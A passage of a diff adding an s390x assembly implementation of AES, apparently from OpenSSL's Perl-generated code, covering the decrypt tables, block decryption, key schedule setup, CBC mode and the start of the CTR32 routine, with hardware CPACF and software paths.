+.byte	0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
+.byte	0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
+.byte	0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
+.byte	0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
+.byte	0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
+.byte	0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
+.byte	0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
+.byte	0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
+.byte	0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
+.byte	0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
+.byte	0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
+.byte	0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
+.byte	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+.byte	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+.byte	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+.size	AES_Td,.-AES_Td
+
+# void AES_decrypt(const unsigned char *inp, unsigned char *out,
+# 		 const AES_KEY *key) {
+.globl	AES_decrypt
+.type	AES_decrypt,\@function
+AES_decrypt:
+___
+$code.=<<___ if (!$softonly);
+	l	%r0,240($key)
+	lhi	%r1,16
+	clr	%r0,%r1
+	jl	.Ldsoft
+
+	la	%r1,0($key)
+	#la	%r2,0($inp)
+	la	%r4,0($out)
+	lghi	%r3,16		# single block length
+	.long	0xb92e0042	# km %r4,%r2
+	brc	1,.-4		# can this happen?
+	br	%r14
+.align	64
+.Ldsoft:
+___
+$code.=<<___;
+	stm${g}	%r3,$ra,3*$SIZE_T($sp)
+
+	llgf	$s0,0($inp)
+	llgf	$s1,4($inp)
+	llgf	$s2,8($inp)
+	llgf	$s3,12($inp)
+
+	larl	$tbl,AES_Td
+	bras	$ra,_s390x_AES_decrypt
+
+	l${g}	$out,3*$SIZE_T($sp)
+	st	$s0,0($out)
+	st	$s1,4($out)
+	st	$s2,8($out)
+	st	$s3,12($out)
+
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	br	$ra
+.size	AES_decrypt,.-AES_decrypt
+
+.type   _s390x_AES_decrypt,\@function
+.align	16
+_s390x_AES_decrypt:
+	st${g}	$ra,15*$SIZE_T($sp)
+	x	$s0,0($key)
+	x	$s1,4($key)
+	x	$s2,8($key)
+	x	$s3,12($key)
+	l	$rounds,240($key)
+	llill	$mask,`0xff<<3`
+	aghi	$rounds,-1
+	j	.Ldec_loop
+.align	16
+.Ldec_loop:
+	srlg	$t1,$s0,`16-3`
+	srlg	$t2,$s0,`8-3`
+	sllg	$t3,$s0,`0+3`
+	srl	$s0,`24-3`
+	nr	$s0,$mask
+	nr	$t1,$mask
+	nr	$t2,$mask
+	ngr	$t3,$mask
+
+	sllg	$i1,$s1,`0+3`	# i0
+	srlg	$i2,$s1,`16-3`
+	srlg	$i3,$s1,`8-3`
+	srl	$s1,`24-3`
+	ngr	$i1,$mask
+	nr	$s1,$mask
+	nr	$i2,$mask
+	nr	$i3,$mask
+
+	l	$s0,0($s0,$tbl)	# Td0[s0>>24]
+	l	$t1,3($t1,$tbl)	# Td1[s0>>16]
+	l	$t2,2($t2,$tbl)	# Td2[s0>>8]
+	l	$t3,1($t3,$tbl)	# Td3[s0>>0]
+
+	x	$s0,1($i1,$tbl)	# Td3[s1>>0]
+	l	$s1,0($s1,$tbl)	# Td0[s1>>24]
+	x	$t2,3($i2,$tbl)	# Td1[s1>>16]
+	x	$t3,2($i3,$tbl)	# Td2[s1>>8]
+
+	srlg	$i1,$s2,`8-3`	# i0
+	sllg	$i2,$s2,`0+3`	# i1
+	srlg	$i3,$s2,`16-3`
+	srl	$s2,`24-3`
+	nr	$i1,$mask
+	ngr	$i2,$mask
+	nr	$s2,$mask
+	nr	$i3,$mask
+
+	xr	$s1,$t1
+	srlg	$ra,$s3,`8-3`	# i1
+	srlg	$t1,$s3,`16-3`	# i0
+	nr	$ra,$mask
+	la	$key,16($key)
+	nr	$t1,$mask
+
+	x	$s0,2($i1,$tbl)	# Td2[s2>>8]
+	x	$s1,1($i2,$tbl)	# Td3[s2>>0]
+	l	$s2,0($s2,$tbl)	# Td0[s2>>24]
+	x	$t3,3($i3,$tbl)	# Td1[s2>>16]
+
+	sllg	$i3,$s3,`0+3`	# i2
+	srl	$s3,`24-3`
+	ngr	$i3,$mask
+	nr	$s3,$mask
+
+	xr	$s2,$t2
+	x	$s0,0($key)
+	x	$s1,4($key)
+	x	$s2,8($key)
+	x	$t3,12($key)
+
+	x	$s0,3($t1,$tbl)	# Td1[s3>>16]
+	x	$s1,2($ra,$tbl)	# Td2[s3>>8]
+	x	$s2,1($i3,$tbl)	# Td3[s3>>0]
+	l	$s3,0($s3,$tbl)	# Td0[s3>>24]
+	xr	$s3,$t3
+
+	brct	$rounds,.Ldec_loop
+	.align	16
+
+	l	$t1,`2048+0`($tbl)	# prefetch Td4
+	l	$t2,`2048+64`($tbl)
+	l	$t3,`2048+128`($tbl)
+	l	$i1,`2048+192`($tbl)
+	llill	$mask,0xff
+
+	srlg	$i3,$s0,24	# i0
+	srlg	$t1,$s0,16
+	srlg	$t2,$s0,8
+	nr	$s0,$mask	# i3
+	nr	$t1,$mask
+
+	srlg	$i1,$s1,24
+	nr	$t2,$mask
+	srlg	$i2,$s1,16
+	srlg	$ra,$s1,8
+	nr	$s1,$mask	# i0
+	nr	$i2,$mask
+	nr	$ra,$mask
+
+	llgc	$i3,2048($i3,$tbl)	# Td4[s0>>24]
+	llgc	$t1,2048($t1,$tbl)	# Td4[s0>>16]
+	llgc	$t2,2048($t2,$tbl)	# Td4[s0>>8]
+	sll	$t1,16
+	llgc	$t3,2048($s0,$tbl)	# Td4[s0>>0]
+	sllg	$s0,$i3,24
+	sll	$t2,8
+
+	llgc	$s1,2048($s1,$tbl)	# Td4[s1>>0]
+	llgc	$i1,2048($i1,$tbl)	# Td4[s1>>24]
+	llgc	$i2,2048($i2,$tbl)	# Td4[s1>>16]
+	sll	$i1,24
+	llgc	$i3,2048($ra,$tbl)	# Td4[s1>>8]
+	sll	$i2,16
+	sll	$i3,8
+	or	$s0,$s1
+	or	$t1,$i1
+	or	$t2,$i2
+	or	$t3,$i3
+
+	srlg	$i1,$s2,8	# i0
+	srlg	$i2,$s2,24
+	srlg	$i3,$s2,16
+	nr	$s2,$mask	# i1
+	nr	$i1,$mask
+	nr	$i3,$mask
+	llgc	$i1,2048($i1,$tbl)	# Td4[s2>>8]
+	llgc	$s1,2048($s2,$tbl)	# Td4[s2>>0]
+	llgc	$i2,2048($i2,$tbl)	# Td4[s2>>24]
+	llgc	$i3,2048($i3,$tbl)	# Td4[s2>>16]
+	sll	$i1,8
+	sll	$i2,24
+	or	$s0,$i1
+	sll	$i3,16
+	or	$t2,$i2
+	or	$t3,$i3
+
+	srlg	$i1,$s3,16	# i0
+	srlg	$i2,$s3,8	# i1
+	srlg	$i3,$s3,24
+	nr	$s3,$mask	# i2
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+	l${g}	$ra,15*$SIZE_T($sp)
+	or	$s1,$t1
+	l	$t0,16($key)
+	l	$t1,20($key)
+
+	llgc	$i1,2048($i1,$tbl)	# Td4[s3>>16]
+	llgc	$i2,2048($i2,$tbl)	# Td4[s3>>8]
+	sll	$i1,16
+	llgc	$s2,2048($s3,$tbl)	# Td4[s3>>0]
+	llgc	$s3,2048($i3,$tbl)	# Td4[s3>>24]
+	sll	$i2,8
+	sll	$s3,24
+	or	$s0,$i1
+	or	$s1,$i2
+	or	$s2,$t2
+	or	$s3,$t3
+
+	xr	$s0,$t0
+	xr	$s1,$t1
+	x	$s2,24($key)
+	x	$s3,28($key)
+
+	br	$ra	
+.size	_s390x_AES_decrypt,.-_s390x_AES_decrypt
+___
+
+$code.=<<___;
+# void AES_set_encrypt_key(const unsigned char *in, int bits,
+# 		 AES_KEY *key) {
+.globl	private_AES_set_encrypt_key
+.type	private_AES_set_encrypt_key,\@function
+.align	16
+private_AES_set_encrypt_key:
+_s390x_AES_set_encrypt_key:
+	lghi	$t0,0
+	cl${g}r	$inp,$t0
+	je	.Lminus1
+	cl${g}r	$key,$t0
+	je	.Lminus1
+
+	lghi	$t0,128
+	clr	$bits,$t0
+	je	.Lproceed
+	lghi	$t0,192
+	clr	$bits,$t0
+	je	.Lproceed
+	lghi	$t0,256
+	clr	$bits,$t0
+	je	.Lproceed
+	lghi	%r2,-2
+	br	%r14
+
+.align	16
+.Lproceed:
+___
+$code.=<<___ if (!$softonly);
+	# convert bits to km code, [128,192,256]->[18,19,20]
+	lhi	%r5,-128
+	lhi	%r0,18
+	ar	%r5,$bits
+	srl	%r5,6
+	ar	%r5,%r0
+
+	larl	%r1,OPENSSL_s390xcap_P
+	lg	%r0,0(%r1)
+	tmhl	%r0,0x4000	# check for message-security assist
+	jz	.Lekey_internal
+
+	lghi	%r0,0		# query capability vector
+	la	%r1,16($sp)
+	.long	0xb92f0042	# kmc %r4,%r2
+
+	llihh	%r1,0x8000
+	srlg	%r1,%r1,0(%r5)
+	ng	%r1,16($sp)
+	jz	.Lekey_internal
+
+	lmg	%r0,%r1,0($inp)	# just copy 128 bits...
+	stmg	%r0,%r1,0($key)
+	lhi	%r0,192
+	cr	$bits,%r0
+	jl	1f
+	lg	%r1,16($inp)
+	stg	%r1,16($key)
+	je	1f
+	lg	%r1,24($inp)
+	stg	%r1,24($key)
+1:	st	$bits,236($key)	# save bits [for debugging purposes]
+	lgr	$t0,%r5
+	st	%r5,240($key)	# save km code
+	lghi	%r2,0
+	br	%r14
+___
+$code.=<<___;
+.align	16
+.Lekey_internal:
+	stm${g}	%r4,%r13,4*$SIZE_T($sp)	# all non-volatile regs and $key
+
+	larl	$tbl,AES_Te+2048
+
+	llgf	$s0,0($inp)
+	llgf	$s1,4($inp)
+	llgf	$s2,8($inp)
+	llgf	$s3,12($inp)
+	st	$s0,0($key)
+	st	$s1,4($key)
+	st	$s2,8($key)
+	st	$s3,12($key)
+	lghi	$t0,128
+	cr	$bits,$t0
+	jne	.Lnot128
+
+	llill	$mask,0xff
+	lghi	$t3,0			# i=0
+	lghi	$rounds,10
+	st	$rounds,240($key)
+
+	llgfr	$t2,$s3			# temp=rk[3]
+	srlg	$i1,$s3,8
+	srlg	$i2,$s3,16
+	srlg	$i3,$s3,24
+	nr	$t2,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+.align	16
+.L128_loop:
+	la	$t2,0($t2,$tbl)
+	la	$i1,0($i1,$tbl)
+	la	$i2,0($i2,$tbl)
+	la	$i3,0($i3,$tbl)
+	icm	$t2,2,0($t2)		# Te4[rk[3]>>0]<<8
+	icm	$t2,4,0($i1)		# Te4[rk[3]>>8]<<16
+	icm	$t2,8,0($i2)		# Te4[rk[3]>>16]<<24
+	icm	$t2,1,0($i3)		# Te4[rk[3]>>24]
+	x	$t2,256($t3,$tbl)	# rcon[i]
+	xr	$s0,$t2			# rk[4]=rk[0]^...
+	xr	$s1,$s0			# rk[5]=rk[1]^rk[4]
+	xr	$s2,$s1			# rk[6]=rk[2]^rk[5]
+	xr	$s3,$s2			# rk[7]=rk[3]^rk[6]
+
+	llgfr	$t2,$s3			# temp=rk[3]
+	srlg	$i1,$s3,8
+	srlg	$i2,$s3,16
+	nr	$t2,$mask
+	nr	$i1,$mask
+	srlg	$i3,$s3,24
+	nr	$i2,$mask
+
+	st	$s0,16($key)
+	st	$s1,20($key)
+	st	$s2,24($key)
+	st	$s3,28($key)
+	la	$key,16($key)		# key+=4
+	la	$t3,4($t3)		# i++
+	brct	$rounds,.L128_loop
+	lghi	$t0,10
+	lghi	%r2,0
+	lm${g}	%r4,%r13,4*$SIZE_T($sp)
+	br	$ra
+
+.align	16
+.Lnot128:
+	llgf	$t0,16($inp)
+	llgf	$t1,20($inp)
+	st	$t0,16($key)
+	st	$t1,20($key)
+	lghi	$t0,192
+	cr	$bits,$t0
+	jne	.Lnot192
+
+	llill	$mask,0xff
+	lghi	$t3,0			# i=0
+	lghi	$rounds,12
+	st	$rounds,240($key)
+	lghi	$rounds,8
+
+	srlg	$i1,$t1,8
+	srlg	$i2,$t1,16
+	srlg	$i3,$t1,24
+	nr	$t1,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+.align	16
+.L192_loop:
+	la	$t1,0($t1,$tbl)
+	la	$i1,0($i1,$tbl)
+	la	$i2,0($i2,$tbl)
+	la	$i3,0($i3,$tbl)
+	icm	$t1,2,0($t1)		# Te4[rk[5]>>0]<<8
+	icm	$t1,4,0($i1)		# Te4[rk[5]>>8]<<16
+	icm	$t1,8,0($i2)		# Te4[rk[5]>>16]<<24
+	icm	$t1,1,0($i3)		# Te4[rk[5]>>24]
+	x	$t1,256($t3,$tbl)	# rcon[i]
+	xr	$s0,$t1			# rk[6]=rk[0]^...
+	xr	$s1,$s0			# rk[7]=rk[1]^rk[6]
+	xr	$s2,$s1			# rk[8]=rk[2]^rk[7]
+	xr	$s3,$s2			# rk[9]=rk[3]^rk[8]
+
+	st	$s0,24($key)
+	st	$s1,28($key)
+	st	$s2,32($key)
+	st	$s3,36($key)
+	brct	$rounds,.L192_continue
+	lghi	$t0,12
+	lghi	%r2,0
+	lm${g}	%r4,%r13,4*$SIZE_T($sp)
+	br	$ra
+
+.align	16
+.L192_continue:
+	lgr	$t1,$s3
+	x	$t1,16($key)		# rk[10]=rk[4]^rk[9]
+	st	$t1,40($key)
+	x	$t1,20($key)		# rk[11]=rk[5]^rk[10]
+	st	$t1,44($key)
+
+	srlg	$i1,$t1,8
+	srlg	$i2,$t1,16
+	srlg	$i3,$t1,24
+	nr	$t1,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+	la	$key,24($key)		# key+=6
+	la	$t3,4($t3)		# i++
+	j	.L192_loop
+
+.align	16
+.Lnot192:
+	llgf	$t0,24($inp)
+	llgf	$t1,28($inp)
+	st	$t0,24($key)
+	st	$t1,28($key)
+	llill	$mask,0xff
+	lghi	$t3,0			# i=0
+	lghi	$rounds,14
+	st	$rounds,240($key)
+	lghi	$rounds,7
+
+	srlg	$i1,$t1,8
+	srlg	$i2,$t1,16
+	srlg	$i3,$t1,24
+	nr	$t1,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+.align	16
+.L256_loop:
+	la	$t1,0($t1,$tbl)
+	la	$i1,0($i1,$tbl)
+	la	$i2,0($i2,$tbl)
+	la	$i3,0($i3,$tbl)
+	icm	$t1,2,0($t1)		# Te4[rk[7]>>0]<<8
+	icm	$t1,4,0($i1)		# Te4[rk[7]>>8]<<16
+	icm	$t1,8,0($i2)		# Te4[rk[7]>>16]<<24
+	icm	$t1,1,0($i3)		# Te4[rk[7]>>24]
+	x	$t1,256($t3,$tbl)	# rcon[i]
+	xr	$s0,$t1			# rk[8]=rk[0]^...
+	xr	$s1,$s0			# rk[9]=rk[1]^rk[8]
+	xr	$s2,$s1			# rk[10]=rk[2]^rk[9]
+	xr	$s3,$s2			# rk[11]=rk[3]^rk[10]
+	st	$s0,32($key)
+	st	$s1,36($key)
+	st	$s2,40($key)
+	st	$s3,44($key)
+	brct	$rounds,.L256_continue
+	lghi	$t0,14
+	lghi	%r2,0
+	lm${g}	%r4,%r13,4*$SIZE_T($sp)
+	br	$ra
+
+.align	16
+.L256_continue:
+	lgr	$t1,$s3			# temp=rk[11]
+	srlg	$i1,$s3,8
+	srlg	$i2,$s3,16
+	srlg	$i3,$s3,24
+	nr	$t1,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+	la	$t1,0($t1,$tbl)
+	la	$i1,0($i1,$tbl)
+	la	$i2,0($i2,$tbl)
+	la	$i3,0($i3,$tbl)
+	llgc	$t1,0($t1)		# Te4[rk[11]>>0]
+	icm	$t1,2,0($i1)		# Te4[rk[11]>>8]<<8
+	icm	$t1,4,0($i2)		# Te4[rk[11]>>16]<<16
+	icm	$t1,8,0($i3)		# Te4[rk[11]>>24]<<24
+	x	$t1,16($key)		# rk[12]=rk[4]^...
+	st	$t1,48($key)
+	x	$t1,20($key)		# rk[13]=rk[5]^rk[12]
+	st	$t1,52($key)
+	x	$t1,24($key)		# rk[14]=rk[6]^rk[13]
+	st	$t1,56($key)
+	x	$t1,28($key)		# rk[15]=rk[7]^rk[14]
+	st	$t1,60($key)
+
+	srlg	$i1,$t1,8
+	srlg	$i2,$t1,16
+	srlg	$i3,$t1,24
+	nr	$t1,$mask
+	nr	$i1,$mask
+	nr	$i2,$mask
+
+	la	$key,32($key)		# key+=8
+	la	$t3,4($t3)		# i++
+	j	.L256_loop
+
+.Lminus1:
+	lghi	%r2,-1
+	br	$ra
+.size	private_AES_set_encrypt_key,.-private_AES_set_encrypt_key
+
+# void AES_set_decrypt_key(const unsigned char *in, int bits,
+# 		 AES_KEY *key) {
+.globl	private_AES_set_decrypt_key
+.type	private_AES_set_decrypt_key,\@function
+.align	16
+private_AES_set_decrypt_key:
+	#st${g}	$key,4*$SIZE_T($sp)	# I rely on AES_set_encrypt_key to
+	st${g}	$ra,14*$SIZE_T($sp)	# save non-volatile registers and $key!
+	bras	$ra,_s390x_AES_set_encrypt_key
+	#l${g}	$key,4*$SIZE_T($sp)
+	l${g}	$ra,14*$SIZE_T($sp)
+	ltgr	%r2,%r2
+	bnzr	$ra
+___
+$code.=<<___ if (!$softonly);
+	#l	$t0,240($key)
+	lhi	$t1,16
+	cr	$t0,$t1
+	jl	.Lgo
+	oill	$t0,0x80	# set "decrypt" bit
+	st	$t0,240($key)
+	br	$ra
+___
+$code.=<<___;
+.align	16
+.Lgo:	lgr	$rounds,$t0	#llgf	$rounds,240($key)
+	la	$i1,0($key)
+	sllg	$i2,$rounds,4
+	la	$i2,0($i2,$key)
+	srl	$rounds,1
+	lghi	$t1,-16
+
+.align	16
+.Linv:	lmg	$s0,$s1,0($i1)
+	lmg	$s2,$s3,0($i2)
+	stmg	$s0,$s1,0($i2)
+	stmg	$s2,$s3,0($i1)
+	la	$i1,16($i1)
+	la	$i2,0($t1,$i2)
+	brct	$rounds,.Linv
+___
+$mask80=$i1;
+$mask1b=$i2;
+$maskfe=$i3;
+$code.=<<___;
+	llgf	$rounds,240($key)
+	aghi	$rounds,-1
+	sll	$rounds,2	# (rounds-1)*4
+	llilh	$mask80,0x8080
+	llilh	$mask1b,0x1b1b
+	llilh	$maskfe,0xfefe
+	oill	$mask80,0x8080
+	oill	$mask1b,0x1b1b
+	oill	$maskfe,0xfefe
+
+.align	16
+.Lmix:	l	$s0,16($key)	# tp1
+	lr	$s1,$s0
+	ngr	$s1,$mask80
+	srlg	$t1,$s1,7
+	slr	$s1,$t1
+	nr	$s1,$mask1b
+	sllg	$t1,$s0,1
+	nr	$t1,$maskfe
+	xr	$s1,$t1		# tp2
+
+	lr	$s2,$s1
+	ngr	$s2,$mask80
+	srlg	$t1,$s2,7
+	slr	$s2,$t1
+	nr	$s2,$mask1b
+	sllg	$t1,$s1,1
+	nr	$t1,$maskfe
+	xr	$s2,$t1		# tp4
+
+	lr	$s3,$s2
+	ngr	$s3,$mask80
+	srlg	$t1,$s3,7
+	slr	$s3,$t1
+	nr	$s3,$mask1b
+	sllg	$t1,$s2,1
+	nr	$t1,$maskfe
+	xr	$s3,$t1		# tp8
+
+	xr	$s1,$s0		# tp2^tp1
+	xr	$s2,$s0		# tp4^tp1
+	rll	$s0,$s0,24	# = ROTATE(tp1,8)
+	xr	$s2,$s3		# ^=tp8
+	xr	$s0,$s1		# ^=tp2^tp1
+	xr	$s1,$s3		# tp2^tp1^tp8
+	xr	$s0,$s2		# ^=tp4^tp1^tp8
+	rll	$s1,$s1,8
+	rll	$s2,$s2,16
+	xr	$s0,$s1		# ^= ROTATE(tp8^tp2^tp1,24)
+	rll	$s3,$s3,24
+	xr	$s0,$s2    	# ^= ROTATE(tp8^tp4^tp1,16)
+	xr	$s0,$s3		# ^= ROTATE(tp8,8)
+
+	st	$s0,16($key)
+	la	$key,4($key)
+	brct	$rounds,.Lmix
+
+	lm${g}	%r6,%r13,6*$SIZE_T($sp)# as was saved by AES_set_encrypt_key!
+	lghi	%r2,0
+	br	$ra
+.size	private_AES_set_decrypt_key,.-private_AES_set_decrypt_key
+___
+
+########################################################################
+# void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
+#                     size_t length, const AES_KEY *key,
+#                     unsigned char *ivec, const int enc)
+{
+my $inp="%r2";
+my $out="%r4";	# length and out are swapped
+my $len="%r3";
+my $key="%r5";
+my $ivp="%r6";
+
+$code.=<<___;
+.globl	AES_cbc_encrypt
+.type	AES_cbc_encrypt,\@function
+.align	16
+AES_cbc_encrypt:
+	xgr	%r3,%r4		# flip %r3 and %r4, out and len
+	xgr	%r4,%r3
+	xgr	%r3,%r4
+___
+$code.=<<___ if (!$softonly);
+	lhi	%r0,16
+	cl	%r0,240($key)
+	jh	.Lcbc_software
+
+	lg	%r0,0($ivp)	# copy ivec
+	lg	%r1,8($ivp)
+	stmg	%r0,%r1,16($sp)
+	lmg	%r0,%r1,0($key)	# copy key, cover 256 bit
+	stmg	%r0,%r1,32($sp)
+	lmg	%r0,%r1,16($key)
+	stmg	%r0,%r1,48($sp)
+	l	%r0,240($key)	# load kmc code
+	lghi	$key,15		# res=len%16, len-=res;
+	ngr	$key,$len
+	sl${g}r	$len,$key
+	la	%r1,16($sp)	# parameter block - ivec || key
+	jz	.Lkmc_truncated
+	.long	0xb92f0042	# kmc %r4,%r2
+	brc	1,.-4		# pay attention to "partial completion"
+	ltr	$key,$key
+	jnz	.Lkmc_truncated
+.Lkmc_done:
+	lmg	%r0,%r1,16($sp)	# copy ivec to caller
+	stg	%r0,0($ivp)
+	stg	%r1,8($ivp)
+	br	$ra
+.align	16
+.Lkmc_truncated:
+	ahi	$key,-1		# it's the way it's encoded in mvc
+	tmll	%r0,0x80
+	jnz	.Lkmc_truncated_dec
+	lghi	%r1,0
+	stg	%r1,16*$SIZE_T($sp)
+	stg	%r1,16*$SIZE_T+8($sp)
+	bras	%r1,1f
+	mvc	16*$SIZE_T(1,$sp),0($inp)
+1:	ex	$key,0(%r1)
+	la	%r1,16($sp)	# restore parameter block
+	la	$inp,16*$SIZE_T($sp)
+	lghi	$len,16
+	.long	0xb92f0042	# kmc %r4,%r2
+	j	.Lkmc_done
+.align	16
+.Lkmc_truncated_dec:
+	st${g}	$out,4*$SIZE_T($sp)
+	la	$out,16*$SIZE_T($sp)
+	lghi	$len,16
+	.long	0xb92f0042	# kmc %r4,%r2
+	l${g}	$out,4*$SIZE_T($sp)
+	bras	%r1,2f
+	mvc	0(1,$out),16*$SIZE_T($sp)
+2:	ex	$key,0(%r1)
+	j	.Lkmc_done
+.align	16
+.Lcbc_software:
+___
+$code.=<<___;
+	stm${g}	$key,$ra,5*$SIZE_T($sp)
+	lhi	%r0,0
+	cl	%r0,`$stdframe+$SIZE_T-4`($sp)
+	je	.Lcbc_decrypt
+
+	larl	$tbl,AES_Te
+
+	llgf	$s0,0($ivp)
+	llgf	$s1,4($ivp)
+	llgf	$s2,8($ivp)
+	llgf	$s3,12($ivp)
+
+	lghi	$t0,16
+	sl${g}r	$len,$t0
+	brc	4,.Lcbc_enc_tail	# if borrow
+.Lcbc_enc_loop:
+	stm${g}	$inp,$out,2*$SIZE_T($sp)
+	x	$s0,0($inp)
+	x	$s1,4($inp)
+	x	$s2,8($inp)
+	x	$s3,12($inp)
+	lgr	%r4,$key
+
+	bras	$ra,_s390x_AES_encrypt
+
+	lm${g}	$inp,$key,2*$SIZE_T($sp)
+	st	$s0,0($out)
+	st	$s1,4($out)
+	st	$s2,8($out)
+	st	$s3,12($out)
+
+	la	$inp,16($inp)
+	la	$out,16($out)
+	lghi	$t0,16
+	lt${g}r	$len,$len
+	jz	.Lcbc_enc_done
+	sl${g}r	$len,$t0
+	brc	4,.Lcbc_enc_tail	# if borrow
+	j	.Lcbc_enc_loop
+.align	16
+.Lcbc_enc_done:
+	l${g}	$ivp,6*$SIZE_T($sp)
+	st	$s0,0($ivp)
+	st	$s1,4($ivp)	
+	st	$s2,8($ivp)
+	st	$s3,12($ivp)
+
+	lm${g}	%r7,$ra,7*$SIZE_T($sp)
+	br	$ra
+
+.align	16
+.Lcbc_enc_tail:
+	aghi	$len,15
+	lghi	$t0,0
+	stg	$t0,16*$SIZE_T($sp)
+	stg	$t0,16*$SIZE_T+8($sp)
+	bras	$t1,3f
+	mvc	16*$SIZE_T(1,$sp),0($inp)
+3:	ex	$len,0($t1)
+	lghi	$len,0
+	la	$inp,16*$SIZE_T($sp)
+	j	.Lcbc_enc_loop
+
+.align	16
+.Lcbc_decrypt:
+	larl	$tbl,AES_Td
+
+	lg	$t0,0($ivp)
+	lg	$t1,8($ivp)
+	stmg	$t0,$t1,16*$SIZE_T($sp)
+
+.Lcbc_dec_loop:
+	stm${g}	$inp,$out,2*$SIZE_T($sp)
+	llgf	$s0,0($inp)
+	llgf	$s1,4($inp)
+	llgf	$s2,8($inp)
+	llgf	$s3,12($inp)
+	lgr	%r4,$key
+
+	bras	$ra,_s390x_AES_decrypt
+
+	lm${g}	$inp,$key,2*$SIZE_T($sp)
+	sllg	$s0,$s0,32
+	sllg	$s2,$s2,32
+	lr	$s0,$s1
+	lr	$s2,$s3
+
+	lg	$t0,0($inp)
+	lg	$t1,8($inp)
+	xg	$s0,16*$SIZE_T($sp)
+	xg	$s2,16*$SIZE_T+8($sp)
+	lghi	$s1,16
+	sl${g}r	$len,$s1
+	brc	4,.Lcbc_dec_tail	# if borrow
+	brc	2,.Lcbc_dec_done	# if zero
+	stg	$s0,0($out)
+	stg	$s2,8($out)
+	stmg	$t0,$t1,16*$SIZE_T($sp)
+
+	la	$inp,16($inp)
+	la	$out,16($out)
+	j	.Lcbc_dec_loop
+
+.Lcbc_dec_done:
+	stg	$s0,0($out)
+	stg	$s2,8($out)
+.Lcbc_dec_exit:
+	lm${g}	%r6,$ra,6*$SIZE_T($sp)
+	stmg	$t0,$t1,0($ivp)
+
+	br	$ra
+
+.align	16
+.Lcbc_dec_tail:
+	aghi	$len,15
+	stg	$s0,16*$SIZE_T($sp)
+	stg	$s2,16*$SIZE_T+8($sp)
+	bras	$s1,4f
+	mvc	0(1,$out),16*$SIZE_T($sp)
+4:	ex	$len,0($s1)
+	j	.Lcbc_dec_exit
+.size	AES_cbc_encrypt,.-AES_cbc_encrypt
+___
+}
+########################################################################
+# void AES_ctr32_encrypt(const unsigned char *in, unsigned char *out,
+#                     size_t blocks, const AES_KEY *key,
+#                     const unsigned char *ivec)
+{
+my $inp="%r2";
+my $out="%r4";	# blocks and out are swapped
+my $len="%r3";
+my $key="%r5";	my $iv0="%r5";
+my $ivp="%r6";
+my $fp ="%r7";
+
+$code.=<<___;
+.globl	AES_ctr32_encrypt
+.type	AES_ctr32_encrypt,\@function
+.align	16
+AES_ctr32_encrypt:
+	xgr	%r3,%r4		# flip %r3 and %r4, $out and $len
+	xgr	%r4,%r3
+	xgr	%r3,%r4
+	llgfr	$len,$len	# safe in ctr32 subroutine even in 64-bit case
+___
+$code.=<<___ if (!$softonly);
+	l	%r0,240($key)
+	lhi	%r1,16
+	clr	%r0,%r1
+	jl	.Lctr32_software
+
+	stm${g}	%r6,$s3,6*$SIZE_T($sp)
+
+	slgr	$out,$inp
+	la	%r1,0($key)	# %r1 is permanent copy of $key
+	lg	$iv0,0($ivp)	# load ivec
+	lg	$ivp,8($ivp)
+
+	# prepare and allocate stack frame at the top of 4K page
+	# with 1K reserved for eventual signal handling
+	lghi	$s0,-1024-256-16# guarantee at least 256-bytes buffer
+	lghi	$s1,-4096
+	algr	$s0,$sp
+	lgr	$fp,$sp
+	ngr	$s0,$s1		# align at page boundary
+	slgr	$fp,$s0		# total buffer size
+	lgr	$s2,$sp
+	lghi	$s1,1024+16	# sl[g]fi is extended-immediate facility
+	slgr	$fp,$s1		# deduct reservation to get usable buffer size
+	# buffer size is at lest 256 and at most 3072+256-16
+
+	la	$sp,1024($s0)	# alloca
+	srlg	$fp,$fp,4	# convert bytes to blocks, minimum 16
+	st${g}	$s2,0($sp)	# back-chain
+	st${g}	$fp,$SIZE_T($sp)
+
+	slgr	$len,$fp
+	brc	1,.Lctr32_hw_switch	# not zero, no borrow
+	algr	$fp,$len	# input is shorter than allocated buffer
+	lghi	$len,0
+	st${g}	$fp,$SIZE_T($sp)
+
+.Lctr32_hw_switch:
+___
+$code.=<<___ if (0);	######### kmctr code was measured to be ~12% slower
+	larl	$s0,OPENSSL_s390xcap_P
+	lg	$s0,8($s0)
+	tmhh	$s0,0x0004	# check for message_security-assist-4
+	jz	.Lctr32_km_loop
+
+	llgfr	$s0,%r0
+	lgr	$s1,%r1
+	lghi	%r0,0
+	la	%r1,16($sp)
+	.long	0xb92d2042	# kmctr %r4,%r2,%r2
+
+	llihh	%r0,0x8000	# check if kmctr supports the function code
+	srlg	%r0,%r0,0($s0)
+	ng	%r0,16($sp)
+	lgr	%r0,$s0
+	lgr	%r1,$s1
+	jz	.Lctr32_km_loop
+
+####### kmctr code
+	algr	$out,$inp	# restore $out
+	lgr	$s1,$len	# $s1 undertakes $len
+	j	.Lctr32_kmctr_loop
+.align	16
+.Lctr32_kmctr_loop:
+	la	$s2,16($sp)
+	lgr	$s3,$fp
